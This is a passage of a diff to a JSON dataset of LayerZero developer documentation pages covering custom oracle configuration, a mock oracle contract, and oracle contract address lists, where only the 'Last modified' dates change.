In Remix, pass these arguments directly into the setConfig call (the tutorial's screenshot of this step is not reproduced here). 3. Checking Oracle Configuration To ensure your Oracle setup is correctly configured: Navigate to the Block Explorer : Go to your chain's Endpoint Address on the designated block explorer. Access the Contract Details : Click on \"Read Contract\". Here, you should see an option labeled defaultReceiveLibraryAddress . Select it to navigate to LayerZero's UltraLightNode. Query the UltraLightNode Contract : getConfig : This returns the current configuration of your UA Contract. defaultAppConfig : This gives the default configuration based on the latest library version. To use this, you'll need to provide the _dstChainId parameter. View the Oracle Parameter For the defaultAppConfig , simply pass the _dstChainId and observe the returned oracle parameter. For the getConfig , pass the _dstChainId , your UA Contract Address, and set the constant CONFIG_TYPE_ORACLE to 6 . Compare Oracle Addresses : At the time of writing this tutorial, TSS is the default testnet Oracle. Therefore, if you haven't made any changes, both getConfig and defaultAppConfig should return identical Oracle addresses. However, if you've opted for a different Oracle from the current default, the two queries should return different Oracle addresses. Understanding Query Results: You might notice a difference in how the queries present the Oracle: defaultAppConfig : This query returns the Oracle as an address. getConfig : In contrast, this displays the Oracle as a bytes value. However, don't be alarmed by this variation. If the only discrepancy between the two results is the presence of '0' padding, then both queries are referencing the same Oracle. 4. Testing Message Delivery Validate your Oracle setup by calling incrementCounter . The protocol should now reflect your custom Oracle configuration and be capable of sending messages in both directions. Congratulations on your successful configuration! A successful oracle configuration will not impact message delivery. Troubleshooting Encountering a FAILED message status on LayerZero Scan? This likely points to a misconfiguration of the oracle address on either one or both contracts. A failed oracle configuration will impact message delivery. Ensure you're using the local oracle address (i.e., the same chain as your UA) when invoking setConfig . Double-check the dstChainId you're passing. For further customization, refer to the UA Custom Configuration documentation. Previous Default Oracle Updates Next Develop an Oracle Last modified 9d ago", + "body": "Configuring Custom Oracle Learn how to seamlessly set up and integrate a new Oracle for your User Application (UA). This tutorial provides a step-by-step guide on setting a new Oracle for your User Application (UA). Understanding Oracle Configuration In LayerZero, Oracle configurations help enable smooth messaging across chain pathways. A chain pathway represents a connected route that utilizes both the Oracle and Relayer to facilitate message routing between blockchains. 1. Consistent Oracle Configuration: It's essential to ensure that the same Oracle provider is present on both the source and destination chains. This uniformity guarantees that messages can be reliably sent and received in both directions on the pathway. 2. Payment and Delivery Logic: If you're paying Oracle A on the source chain, you'd expect Oracle A to also handle the delivery on the destination chain. Hence, if Oracle A is available on both chains, it can be used in both directions. 
On the other hand, if Oracle A is only present on one chain, you'd need to opt for an alternative that's supported on both chain directions. Remember, the objective is to ensure that the Oracle setup supports the chain pathways, as they are the conduits for message routing. This is vital for efficient, error-free cross-chain communication. Prerequisites You should have an LZApp to start with that's already working with default settings. While we use OmniCounter in this tutorial, any app that inherits LZApp.sol (including the OFT and ONFT standards) can be used. In order to set a new Oracle, all a user will need to do is call the setConfig function on Chain A and Chain B. Below is a simple example of how to set your Oracle, using the Ethereum Goerli and Optimism Goerli Testnets. Example: Setting an Oracle using Ethereum Goerli and Optimism Goerli Testnets 1. Deploying OmniCounter After deploying OmniCounter on both Goerli and OP-Goerli, ensure that: You've correctly called setTrustedRemote . The incrementCounter function works by default on both contracts. // SPDX-License-Identifier: MIT pragma solidity ^ 0.8.0 ; pragma abicoder v2 ; import \"https://github.com/LayerZero-Labs/solidity-examples/blob/e43908440cefdcbc93cd8e0ea863326c4bd904eb/contracts/lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { bytes public constant PAYLOAD = \"\\x01\\x02\\x03\\x04\" ; uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { counter += 1 ; } function estimateFee ( uint16 _dstChainId , bool _useZro , bytes calldata _adapterParams ) public view returns ( uint nativeFee , uint zroFee ) { return lzEndpoint . estimateFees ( _dstChainId , address ( this ), PAYLOAD , _useZro , _adapterParams ); } function incrementCounter ( uint16 _dstChainId ) public payable { _lzSend ( _dstChainId , PAYLOAD , payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" ), msg . value ); } } 2. Setting a New Oracle To modify your UA contracts, you'll need to invoke the setConfig function. This can be done directly from a verified block explorer or using scripting tools. In this tutorial, we'll demonstrate using Remix. Here's how to set the Oracle for the Goerli OmniCounter using the Goerli TSS Oracle address, 0x36ebea3941907c438ca8ca2b1065deef21ccdaed : let config = ethers . utils . defaultAbiCoder . encode ( [ \"address\" ], [ \"0x36ebea3941907c438ca8ca2b1065deef21ccdaed\" ] // oracleAddress ) await lzEndpoint . setConfig ( 0 , // default library version 10132 , // dstChainId 6 , // CONFIG_TYPE_ORACLE config // ABI-encoded oracle address ) This process should be repeated on both the source and destination contracts. Ensure you adjust the _dstChainId and oracleAddress based on the contract's location. For instance, on OP Goerli, use the OP Goerli TSS Oracle Address and set the destination chain to 10121 for Goerli ETH. In Remix, pass these arguments directly into the setConfig call (the tutorial's screenshot of this step is not reproduced here). 3. Checking Oracle Configuration To ensure your Oracle setup is correctly configured: Navigate to the Block Explorer : Go to your chain's Endpoint Address on the designated block explorer. Access the Contract Details : Click on \"Read Contract\". Here, you should see an option labeled defaultReceiveLibraryAddress . 
Select it to navigate to LayerZero's UltraLightNode. Query the UltraLightNode Contract : getConfig : This returns the current configuration of your UA Contract. defaultAppConfig : This gives the default configuration based on the latest library version. To use this, you'll need to provide the _dstChainId parameter. View the Oracle Parameter For the defaultAppConfig , simply pass the _dstChainId and observe the returned oracle parameter. For the getConfig , pass the _dstChainId , your UA Contract Address, and set the constant CONFIG_TYPE_ORACLE to 6 . Compare Oracle Addresses : At the time of writing this tutorial, TSS is the default testnet Oracle. Therefore, if you haven't made any changes, both getConfig and defaultAppConfig should return identical Oracle addresses. However, if you've opted for a different Oracle from the current default, the two queries should return different Oracle addresses. Understanding Query Results: You might notice a difference in how the queries present the Oracle: defaultAppConfig : This query returns the Oracle as an address. getConfig : In contrast, this displays the Oracle as a bytes value. However, don't be alarmed by this variation. If the only discrepancy between the two results is the presence of '0' padding, then both queries are referencing the same Oracle. 4. Testing Message Delivery Validate your Oracle setup by calling incrementCounter . The protocol should now reflect your custom Oracle configuration and be capable of sending messages in both directions. Congratulations on your successful configuration! A successful oracle configuration will not impact message delivery. Troubleshooting Encountering a FAILED message status on LayerZero Scan? This likely points to a misconfiguration of the oracle address on either one or both contracts. A failed oracle configuration will impact message delivery. Ensure you're using the local oracle address (i.e., the same chain as your UA) when invoking setConfig . Double-check the dstChainId you're passing. For further customization, refer to the UA Custom Configuration documentation. Previous Default Oracle Updates Next Develop an Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1410,7 +1410,7 @@ { "title": "Default Oracle Updates", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/default-oracle-updates", - "body": "Default Oracle Updates Keep up to date with the latest Oracle for Default User Applications (UAs). By default, UAs opt into the LayerZero Protocol library updates. These updates generally bring improvements and changes to the reliability of the protocol's generic messaging. These libraries are append-only, meaning that previous versions will always be available for UAs that decide not to use the default config. Opting Out of Defaults For UAs that want to fully control or lock their Oracle properties, see UA Custom Configuration to learn more. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e., best-practice changes to block confirmations, proof libraries, etc.) Projects with custom configurations will not have their settings impacted, but are free to reconfigure settings back to Defaults or to any other Oracle at any given time. Google Cloud Oracle (default as of 9/19/23) Google Cloud (GCP) provides a Google Cloud Oracle to secure messaging in the LayerZero Protocol. 
The Google Cloud Oracle is the default Oracle for all dApps built using the LayerZero protocol. Enterprises and developers of all sizes can now rely on the combination of an established entity (GCP) and a leading Web3 company (LayerZero) to address their interoperability challenges. That said, each Oracle provides unique costs and benefits. UAs are encouraged to select the best Oracle that suits their needs. Ecosystem - Previous Oracle Next Configuring Custom Oracle Last modified 12d ago", + "body": "Default Oracle Updates Keep up to date with the latest Oracle for Default User Applications (UAs). By default, UAs opt into the LayerZero Protocol library updates. These updates generally bring improvements and changes to the reliability of the protocol's generic messaging. These libraries are append-only, meaning that previous versions will always be available for UAs that decide not to use the default config. Opting Out of Defaults For UAs that want to fully control or lock their Oracle properties, see UA Custom Configuration to learn more. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e., best-practice changes to block confirmations, proof libraries, etc.) Projects with custom configurations will not have their settings impacted, but are free to reconfigure settings back to Defaults or to any other Oracle at any given time. Google Cloud Oracle (default as of 9/19/23) Google Cloud (GCP) provides a Google Cloud Oracle to secure messaging in the LayerZero Protocol. The Google Cloud Oracle is the default Oracle for all dApps built using the LayerZero protocol. Enterprises and developers of all sizes can now rely on the combination of an established entity (GCP) and a leading Web3 company (LayerZero) to address their interoperability challenges. That said, each Oracle provides unique costs and benefits. UAs are encouraged to select the best Oracle that suits their needs. Ecosystem - Previous Oracle Next Configuring Custom Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1418,7 +1418,7 @@ { "title": "Develop an Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/develop-an-oracle", - "body": "Develop an Oracle Get paid to perform one of the roles in the LayerZero system. Oracle Specification Performing the job of an Oracle means moving a piece of the message data from one chain and storing it in another. Please refer to our Oracle Specification document to learn more. Two of the primary requirements for operating an Oracle (per-chain): Deploy and maintain balances in your own contract. Implement and operate a system that can submit data from Chain A to Chain B. In this gitbook, we won't get into the details of the implementation of an Oracle because LayerZero relies on other ecosystem partners. We do, however, expose some example solidity contracts to demonstrate the contractual portion of a simple Oracle on an EVM: ILayerZeroOracle.sol See the LayerZero Oracle contract interface . 
LayerZeroOracleMock.sol Here's the Oracle we use for internal testing: // SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.7.6 ; import \"@openzeppelin/contracts/utils/ReentrancyGuard.sol\" ; import \"@openzeppelin/contracts/access/Ownable.sol\" ; import \"../interfaces/ILayerZeroOracle.sol\" ; import \"../interfaces/ILayerZeroUltraLightNodeV1.sol\" ; contract LayerZeroOracleMock is ILayerZeroOracle , Ownable , ReentrancyGuard { mapping ( address => bool ) public approvedAddresses ; mapping ( uint16 => mapping ( uint16 => uint )) public chainPriceLookup ; uint public fee ; ILayerZeroUltraLightNodeV1 public uln ; // ultraLightNode instance event OracleNotified ( uint16 dstChainId , uint16 _outboundProofType , uint blockConfirmations ); event Withdraw ( address to , uint amount ); constructor () { approvedAddresses [ msg . sender ] = true ; } function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external override { emit OracleNotified ( _dstChainId , _outboundProofType , _outboundBlockConfirmations ); } function updateHash ( uint16 _remoteChainId , bytes32 _blockHash , uint _confirmations , bytes32 _data ) external { require ( approvedAddresses [ msg . sender ], \"LayerZeroOracleMock: caller must be approved\" ); uln . updateHash ( _remoteChainId , _blockHash , _confirmations , _data ); } function withdraw ( address payable _to , uint _amount ) public onlyOwner nonReentrant { ( bool success , ) = _to . call { value : _amount }( \"\" ); require ( success , \"failed to withdraw\" ); emit Withdraw ( _to , _amount ); } // owner can set uln function setUln ( address ulnAddress ) external onlyOwner { uln = ILayerZeroUltraLightNodeV1 ( ulnAddress ); } // mock, doesn't do anything function setJob ( uint16 _chain , address _oracle , bytes32 _id , uint _fee ) public onlyOwner {} function setDeliveryAddress ( uint16 _dstChainId , address _deliveryAddress ) public onlyOwner {} function setPrice ( uint16 _destinationChainId , uint16 _outboundProofType , uint _price ) external onlyOwner { chainPriceLookup [ _outboundProofType ][ _destinationChainId ] = _price ; } function setApprovedAddress ( address _oracleAddress , bool _approve ) external { approvedAddresses [ _oracleAddress ] = _approve ; } function isApproved ( address _relayerAddress ) public view override returns ( bool ) { return approvedAddresses [ _relayerAddress ]; } function getPrice ( uint16 _destinationChainId , uint16 _outboundProofType ) external view override returns ( uint ) { return chainPriceLookup [ _outboundProofType ][ _destinationChainId ]; } fallback () external payable {} receive () external payable {} } Previous Configuring Custom Oracle Next Google Cloud Oracle Last modified 16d ago", + "body": "Develop an Oracle Get paid to perform one of the roles in the LayerZero system. Oracle Specification Performing the job of an Oracle means moving a piece of the message data from one chain and storing it in another. Please refer to our Oracle Specification document to learn more. Two of the primary requirements for operating an Oracle (per-chain): Deploy and maintain balances in your own contract. Implement and operate a system that can submit data from Chain A to Chain B. In this gitbook, we won't get into the details of the implementation of an Oracle because LayerZero relies on other ecosystem partners. 
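As a rough illustration of the second requirement above (an off-chain system that submits data from Chain A to Chain B), the TypeScript (ethers v5) sketch below listens for the mock's OracleNotified event, waits out the requested confirmations, and forwards the block hash. The RPC URLs, oracle addresses, and chain ID are placeholders, and using the receipts root as _data is an assumption for illustration; the ABI fragments mirror the LayerZeroOracleMock contract shown in this entry.

import { ethers } from 'ethers';

// Placeholder endpoints; the wallet must be in the destination oracle's approvedAddresses.
const src = new ethers.providers.JsonRpcProvider('https://rpc.chain-a.example');
const dst = new ethers.providers.JsonRpcProvider('https://rpc.chain-b.example');
const wallet = new ethers.Wallet(process.env.ORACLE_KEY as string, dst);

const SRC_CHAIN_ID = 10121; // LayerZero chain id of Chain A (example value)

// ABI fragments copied from the mock contract in this entry.
const srcOracle = new ethers.Contract(
  '0xOracleOnChainA',
  ['event OracleNotified(uint16 dstChainId, uint16 _outboundProofType, uint blockConfirmations)'],
  src
);
const dstOracle = new ethers.Contract(
  '0xOracleOnChainB',
  ['function updateHash(uint16 _remoteChainId, bytes32 _blockHash, uint _confirmations, bytes32 _data)'],
  wallet
);

srcOracle.on('OracleNotified', async (_dstChainId, _proofType, confirmations, event) => {
  // Wait until the notifying block has the requested number of confirmations.
  const target = event.blockNumber + confirmations.toNumber();
  while ((await src.getBlockNumber()) < target) {
    await new Promise((r) => setTimeout(r, 5000));
  }
  // Ship the confirmed block hash to Chain B; here _data is assumed to carry the receipts root.
  const block = await src.send('eth_getBlockByNumber', [ethers.utils.hexValue(event.blockNumber), false]);
  await dstOracle.updateHash(SRC_CHAIN_ID, block.hash, confirmations, block.receiptsRoot);
});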
We do, however, expose some example solidity contracts to demonstrate the contractual portion of a simple Oracle on an EVM: ILayerZeroOracle.sol See the LayerZero Oracle contract interface . LayerZeroOracleMock.sol Here's the Oracle we use for internal testing: // SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.7.6 ; import \"@openzeppelin/contracts/utils/ReentrancyGuard.sol\" ; import \"@openzeppelin/contracts/access/Ownable.sol\" ; import \"../interfaces/ILayerZeroOracle.sol\" ; import \"../interfaces/ILayerZeroUltraLightNodeV1.sol\" ; contract LayerZeroOracleMock is ILayerZeroOracle , Ownable , ReentrancyGuard { mapping ( address => bool ) public approvedAddresses ; mapping ( uint16 => mapping ( uint16 => uint )) public chainPriceLookup ; uint public fee ; ILayerZeroUltraLightNodeV1 public uln ; // ultraLightNode instance event OracleNotified ( uint16 dstChainId , uint16 _outboundProofType , uint blockConfirmations ); event Withdraw ( address to , uint amount ); constructor () { approvedAddresses [ msg . sender ] = true ; } function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external override { emit OracleNotified ( _dstChainId , _outboundProofType , _outboundBlockConfirmations ); } function updateHash ( uint16 _remoteChainId , bytes32 _blockHash , uint _confirmations , bytes32 _data ) external { require ( approvedAddresses [ msg . sender ], \"LayerZeroOracleMock: caller must be approved\" ); uln . updateHash ( _remoteChainId , _blockHash , _confirmations , _data ); } function withdraw ( address payable _to , uint _amount ) public onlyOwner nonReentrant { ( bool success , ) = _to . call { value : _amount }( \"\" ); require ( success , \"failed to withdraw\" ); emit Withdraw ( _to , _amount ); } // owner can set uln function setUln ( address ulnAddress ) external onlyOwner { uln = ILayerZeroUltraLightNodeV1 ( ulnAddress ); } // mock, doesn't do anything function setJob ( uint16 _chain , address _oracle , bytes32 _id , uint _fee ) public onlyOwner {} function setDeliveryAddress ( uint16 _dstChainId , address _deliveryAddress ) public onlyOwner {} function setPrice ( uint16 _destinationChainId , uint16 _outboundProofType , uint _price ) external onlyOwner { chainPriceLookup [ _outboundProofType ][ _destinationChainId ] = _price ; } function setApprovedAddress ( address _oracleAddress , bool _approve ) external { approvedAddresses [ _oracleAddress ] = _approve ; } function isApproved ( address _relayerAddress ) public view override returns ( bool ) { return approvedAddresses [ _relayerAddress ]; } function getPrice ( uint16 _destinationChainId , uint16 _outboundProofType ) external view override returns ( uint ) { return chainPriceLookup [ _outboundProofType ][ _destinationChainId ]; } fallback () external payable {} receive () external payable {} } Previous Configuring Custom Oracle Next Google Cloud Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1426,7 +1426,7 @@ { "title": "Google Cloud Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/google-cloud-oracle", - "body": "Google Cloud Oracle Contract Addresses to use Google Oracle with LayerZero The Google Oracle, as of 9/19/23, is the default oracle configuration for LayerZero messaging. 
Mainnet Addresses Ethereum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc BNB: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Avalanche: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Polygon: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Optimism: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Fantom: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Gnosis: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Base: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Harmony: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Moonbeam: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Celo: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum Nova: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Linea: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Previous Develop an Oracle Next TSS Oracle Last modified 13d ago", + "body": "Google Cloud Oracle Contract Addresses to use Google Oracle with LayerZero The Google Oracle, as of 9/19/23, is the default oracle configuration for LayerZero messaging. Mainnet Addresses Ethereum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc BNB: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Avalanche: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Polygon: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Optimism: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Fantom: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Gnosis: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Base: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Harmony: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Moonbeam: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Celo: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum Nova: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Linea: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Previous Develop an Oracle Next TSS Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1434,7 +1434,7 @@ { "title": "Overview of Polyhedra zkLightClient", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient", - "body": "Overview of Polyhedra zkLightClient Integration of zero-knowledge proof technology will enhance security, performance, and cost-efficiency for cross-chain interoperability on all chains supported by LayerZero Polyhedra Network is building the next generation of infrastructure for Web3 interoperability by leveraging advanced zero-knowledge proof (ZKP) technology, a fundamental cryptographic primitive that guarantees the validity of data and computations while maintaining data confidentiality. The Polyhedra Network team designed and developed Polyhedra zkLightClient technology, a cutting-edge solution built on LayerZero Protocol, providing secure and efficient cross-chain infrastructures for Layer-1 and Layer-2 interoperability. Previous Chainlink Oracle Next zkLightClient on LayerZero Last modified 16d ago", + "body": "Overview of Polyhedra zkLightClient Integration of zero-knowledge proof technology will enhance security, performance, and cost-efficiency for cross-chain interoperability on all chains supported by LayerZero Polyhedra Network is building the next generation of infrastructure for Web3 interoperability by leveraging advanced zero-knowledge proof (ZKP) technology, a fundamental cryptographic primitive that guarantees the validity of data and computations while maintaining data confidentiality. 
The Polyhedra Network team designed and developed Polyhedra zkLightClient technology, a cutting-edge solution built on LayerZero Protocol, providing secure and efficient cross-chain infrastructures for Layer-1 and Layer-2 interoperability. Previous Chainlink Oracle Next zkLightClient on LayerZero Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1442,7 +1442,7 @@ { "title": "TSS Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/tss-oracle", - "body": "TSS Oracle Contract Addresses to use TSS Oracle with LayerZero To use the TSS oracle with your LayerZero UserApplication, configure your app with the addresses below. TSS Oracle Mainnet Addresses Ethereum: 0x5a54fe5234e811466d5366846283323c954310b2 BNB: 0x5a54fe5234e811466d5366846283323c954310b2 Avalanche: 0x5a54fe5234e811466d5366846283323c954310b2 Polygon: 0x5a54fe5234e811466d5366846283323c954310b2 Arbitrum: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Optimism: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Fantom: 0xa0cc33dd6f4819d473226257792afe230ec3c67f DFK: 0x88bd5f18a13c22c41cf5c8cba12eb371c4bd18d9 Harmony: 0x3e2ef091d7606e4ca3b8d84bcaf23da0ffa11053 Moonbeam: 0xdeef80c12d49e5da8e01b05636e2d0c776f6b78d Celo: 0x071c3f1bc3046c693c3abbc03a87ca9a30e43be2 Dexalot: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Fuse: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Gnosis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Metis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Klaytn: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb CoreDAO: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb OKX (OKT): 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Goerli: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Dos: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Sepolia: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb zkSync: 0xcb7ad38d45ab5bcf5880b0fa851263c29582c18a Polygon zkEVM: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Moonriver: 0x84070061032f3e7ea4e068f447fb7cdfc98d57fe Shrapnel: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Tenet: 0x282b3386571f7f794450d5789911a9804FA346b4 Nova: 0x37aaaf95887624a363effB7762D489E3C05c2a02 Canto: 0x377530cdA84DFb2673bF4d145DCF0C4D7fdcB5b6 Meter: 0x51A6E62D12F2260E697039Ff53bCB102053f5ab7 Kava: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Base: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Linea: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Mantle: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Zora: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Telos: 0x4514FC667a944752ee8A29F544c1B20b1A315f25 Meritcircle: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Aptos: 0x12e12de0af996d9611b0b78928cd9f4cbf50d94d972043cdd829baa77a78929b TSS Oracle Testnet Addresses Ethereum: 0x36ebea3941907c438ca8ca2b1065deef21ccdaed BNB: 0x53ccb44479b2666cf93f5e815f75738aa5c6d3b9 Avalanche: 0x92cfdb3789693c2ae7225fcc2c263de94d630be4 Polygon: 0xaec5e56217a963bde38a3b6e0c3cb5e864450c86 Arbitrum: 0x9e13017d416cdf0816bccac744760dd1c374cd20 Optimism: 0x97597016f7dac89e55005105fc755c0513973fa8 Fantom: 0x9b743b9846230b657546fb942c6b11a23cfecd9a DFK: 0x7cfb4fadedc96793f844371d8498f4fdcd37da61 Dexalot: 0xab38efc6917086576137e4927af3a4d57da5f00c Moonbeam: 0xa85bfaa7bec20e014e5c29cb3536231116f3f789 Harmony: 0xb099d5a9652a80ff8f4234bde00f66531aa91c50 Celo: 0x894a918a9c2bfa6d32874e40ef4bba75b820b17c Fuse: 0x340b5e5e90a6d177e7614222081e0f9cdd54f25c Klaytn: 0xd682ecf100f6f4284138aa925348633b0611ae21 Metis: 0xd682ecf100f6f4284138aa925348633b0611ae21 CoreDAO: 0xb0487596a0b62d1a71d0c33294bd6eb635fc6b09 Gnosis: 0xd682ecf100f6f4284138aa925348633b0611ae21 zkSync: 0x2DCC8cFb612fDbC0Fb657eA1B51A6F77b8b86448 
OKX (OKT): 0xd682ecf100f6f4284138aa925348633b0611ae21 Linea: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Base: 0x53fd4c4fbbd53f6bc58cae6704b92db1f360a648 Sepolia: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Meter: 0x0e8738298a8e437035e3aebd57f8dddc1a1bc44a Polygon zkEVM: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Kava: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tenet: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Canto: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Aptos: 0x47a30bcdb5b5bdbf6af883c7325827f3e40b3f52c3538e9e677e68cf0c0db060 Meritcircle: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Mantle: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Zora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Loot: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Telos: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tomo: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff opBNB: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Shimmer: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Aurora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Lif3: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Previous Google Cloud Oracle Next Chainlink Oracle Last modified 12d ago", + "body": "TSS Oracle Contract Addresses to use TSS Oracle with LayerZero To use the TSS oracle with your LayerZero UserApplication, configure your app with the addresses below. TSS Oracle Mainnet Addresses Ethereum: 0x5a54fe5234e811466d5366846283323c954310b2 BNB: 0x5a54fe5234e811466d5366846283323c954310b2 Avalanche: 0x5a54fe5234e811466d5366846283323c954310b2 Polygon: 0x5a54fe5234e811466d5366846283323c954310b2 Arbitrum: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Optimism: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Fantom: 0xa0cc33dd6f4819d473226257792afe230ec3c67f DFK: 0x88bd5f18a13c22c41cf5c8cba12eb371c4bd18d9 Harmony: 0x3e2ef091d7606e4ca3b8d84bcaf23da0ffa11053 Moonbeam: 0xdeef80c12d49e5da8e01b05636e2d0c776f6b78d Celo: 0x071c3f1bc3046c693c3abbc03a87ca9a30e43be2 Dexalot: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Fuse: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Gnosis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Metis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Klaytn: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb CoreDAO: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb OKX (OKT): 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Goerli: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Dos: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Sepolia: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb zkSync: 0xcb7ad38d45ab5bcf5880b0fa851263c29582c18a Polygon zkEVM: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Moonriver: 0x84070061032f3e7ea4e068f447fb7cdfc98d57fe Shrapnel: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Tenet: 0x282b3386571f7f794450d5789911a9804FA346b4 Nova: 0x37aaaf95887624a363effB7762D489E3C05c2a02 Canto: 0x377530cdA84DFb2673bF4d145DCF0C4D7fdcB5b6 Meter: 0x51A6E62D12F2260E697039Ff53bCB102053f5ab7 Kava: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Base: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Linea: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Mantle: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Zora: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Telos: 0x4514FC667a944752ee8A29F544c1B20b1A315f25 Meritcircle: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Aptos: 0x12e12de0af996d9611b0b78928cd9f4cbf50d94d972043cdd829baa77a78929b TSS Oracle Testnet Addresses Ethereum: 0x36ebea3941907c438ca8ca2b1065deef21ccdaed BNB: 0x53ccb44479b2666cf93f5e815f75738aa5c6d3b9 Avalanche: 0x92cfdb3789693c2ae7225fcc2c263de94d630be4 Polygon: 0xaec5e56217a963bde38a3b6e0c3cb5e864450c86 Arbitrum: 